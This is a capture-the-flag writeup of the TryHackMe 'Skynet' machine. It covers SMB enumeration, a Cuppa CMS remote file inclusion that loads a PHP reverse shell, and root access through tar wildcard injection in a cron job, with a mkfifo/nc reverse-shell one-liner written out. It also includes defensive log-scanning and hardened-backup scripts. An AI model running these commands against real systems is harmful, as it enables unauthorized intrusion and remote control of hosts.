TryHackMe Skynet writeup

Skynet is the fifth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

Enumeration

Let’s start with the nmap scan:

nmap -sC -sV -o nmap.txt <target_ip>

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X 
143/tcp open  imap        Dovecot imapd

As port 80 is open, let’s also run gobuster:

gobuster dir -u http://<target_ip> -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 03:58:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2020/10/19 03:58:57 Finished
===============================================================

We discovered the /squirrelmail directory, but it requires authentication.

Let’s enumerate more! We still have services we haven’t checked yet. What about SMB?

smbmap -H  <target_ip>
[+] Guest session       IP: <target_ip>:445    Name: <target_ip>                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

It seems that only the anonymous share is readable without authentication. It’s a good idea to check what is inside:

smbclient \\\\<target_ip>\\anonymous

smb: \> ls
  .                                   D        0  Wed Sep 18 00:41:20 2019
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019
  books                               D        0  Wed Sep 18 00:40:06 2019

9204224 blocks of size 1024. 5373504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Wed Sep 18 00:41:20 2019
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019

The content of attention.txt is:

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

Only log1.txt in \logs is worth looking at, as it contains a list of possible passwords:

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

A short sum-up of the enumeration phase:

  • we have milesdyson as a potential username

  • we have the list of potential passwords

  • we have two places to try them out: SSH and SquirrelMail

It is less likely that SSH will be our way in, so let’s give SquirrelMail a try.

Try to find the correct password for user milesdyson on http://<target_ip>/squirrelmail/src/login.php.

I used Burp Suite for that; Hydra would also do the trick, but you can even do it manually, it will not take long.

Alright, we are in! Let’s check the emails.

One of them is very interesting; the others are useless.

The email with the subject “Samba Password reset” will catch your eye immediately:

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

This email was sent from skynet@skynet to milesdyson, so now we have the password for the SMB share!

Log in to the SMB share with this password and look around.

You will find a file pointing out that something interesting can be found at /45kra24zxs28v3yd.

We didn’t find that directory on the SMB share; let’s check whether it’s on port 80.

Navigate to http://<target_ip>/45kra24zxs28v3yd/ and check what’s there.

Not so useful, huh?

Fire up your gobuster one more time:

gobuster dir -u http://<target_ip>/45kra24zxs28v3yd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 04:21:37 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2020/10/19 04:21:58 Finished
===============================================================

Yet another vector! The /administrator directory leads us to the login form of the Cuppa CMS. Unfortunately, the credentials that we already have will not work here.

Let’s look for other ways in.

We don’t know the version of the Cuppa CMS, but it will not hurt to check for available exploits.


Exploitation

searchsploit cuppa

Cuppa CMS - '/alertConfigField.php' Local/Remote File | php/webapps/25971.txt

There is only one hit, a local/remote file inclusion. As we don’t have any other ideas, let’s try it out:

Grab a copy of php-reverse-shell.php from PentestMonkey, specify your IP and port.

Open nc listener:

sudo nc -nlvp 1337

Start a web server in the folder containing your reverse shell:

sudo python -m SimpleHTTPServer 80

Finally, let’s trigger the exploit itself:

http://<target_ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php

Catch your shell!

You can upgrade your shell with:

/usr/bin/script -qc /bin/bash /dev/null
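For the defensive side of this step, here is an added example (not part of the original writeup) that scans Apache access-log lines for requests passing a remote URL as a query-parameter value, which is the shape of the alertConfigField.php request above. The log lines are constructed, and the 10.0.0.x addresses, the second percent-encoded example and the function names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup. The log lines below are
# constructed (combined log format); they are not from the Skynet machine.
SAMPLE_LOG='10.0.0.5 - - [19/Oct/2020:04:30:01 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.0.0.9/php-reverse-shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [19/Oct/2020:04:30:02 +0000] "GET /45kra24zxs28v3yd/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Oct/2020:04:30:03 +0000] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Oct/2020:04:30:04 +0000] "GET /admin/?next=https%3A%2F%2Fevil.example%2Fx HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# Print the log lines whose query string has a parameter whose value begins
# with a URL scheme, either raw (http://) or percent-encoded (http%3A%2F%2F).
# Reads stdin; "|| true" keeps an empty result from aborting under set -e.
flag_remote_includes() {
    grep -E '"(GET|POST) [^ ]*\?[^ ]*=(https?|ftp)(://|%3[aA]%2[fF]%2[fF])' || true
}

# Reduce flagged lines to "client_ip request_path" pairs for triage.
# In the combined log format field 7 is the request target; drop its query.
summarize() {
    flag_remote_includes | awk '{ split($7, p, "?"); print $1, p[1] }'
}

printf '%s\n' "$SAMPLE_LOG" | summarize
```

Pipe a real access log into summarize to get the same triage view. Any hit on alertConfigField.php whose urlConfig value has this shape deserves an immediate look, and setting PHP’s allow_url_include to Off removes the remote half of this inclusion bug regardless of the CMS version.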

PrivEsc

Transfer your favorite privilege escalation tool to the machine. As we already have SimpleHTTPServer running on port 80, you can use it for that.

cd to a folder where you have write access (/tmp, for instance) and download the tool.

I will use Linux Smart Enumeration this time:

www-data@skynet:/tmp$ wget http://<your_ip>/lse.sh
www-data@skynet:/tmp$ chmod +x lse.sh
www-data@skynet:/tmp$ ./lse.sh

lse has a great -l flag, which lets you specify how much detail is shown. I recommend starting without it, and if you don’t find anything useful, run lse.sh again with -l 1, -l 2 or -l 3.

You will eventually spot a CRON job running /home/milesdyson/backups/backup.sh. Let’s investigate:

www-data@skynet:/tmp$ ls -la /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh

www-data@skynet:/tmp$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

So we can’t edit the file, but what we can do is exploit the wildcard in the script: the shell expands * into the file names in /var/www/html, and tar treats any name that starts with -- as an option.

You can read more about this vulnerability here.

Navigate to /var/www/html and do the following:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Wait for a CRON job to execute your shell.sh.

Catch the root shell!
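As an added example (not the machine’s own backup.sh), here is how the backup step could be written so that file names are never parsed as tar options, together with a small audit helper for finding the risky pattern in other cron scripts. The function names are assumptions; the paths in the comments are the ones from the writeup.

```shell
#!/bin/sh
# Added example, not the script found on the machine.

# Hardened archive step. Passing the directory with -C and archiving "."
# means the shell never expands a wildcard, so tar receives no file names as
# arguments: a file called "--checkpoint-action=..." is stored as data,
# never parsed as an option.
safe_backup() {
    src="$1"
    out="$2"
    tar cf "$out" -C "$src" .
}

# Audit helper: report lines in a script where tar is followed by an
# unquoted "*" that the shell will expand into arguments, the pattern in
# /home/milesdyson/backups/backup.sh. "|| true" keeps a clean script from
# aborting the caller under set -e.
find_tar_wildcards() {
    grep -nE '(^|[;&|[:space:]])tar[[:space:]].*[[:space:]]\*' "$1" || true
}
```

The root cause is that the shell, not tar, expands *, so whoever can create files in /var/www/html chooses tar’s arguments. Passing the directory with -C and archiving . sidesteps expansion altogether; a script that root runs from cron should also not be reading its inputs from a directory the web server user can write to. Point find_tar_wildcards at /etc/cron.* scripts to look for the same pattern elsewhere.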


Takeaway

  • Enumeration can easily take half of the time spent on the machine.

  • “Connecting the dots” is a useful skill for penetration testing.

  • Be patient when exploiting CRON jobs; it can take a while for them to execute.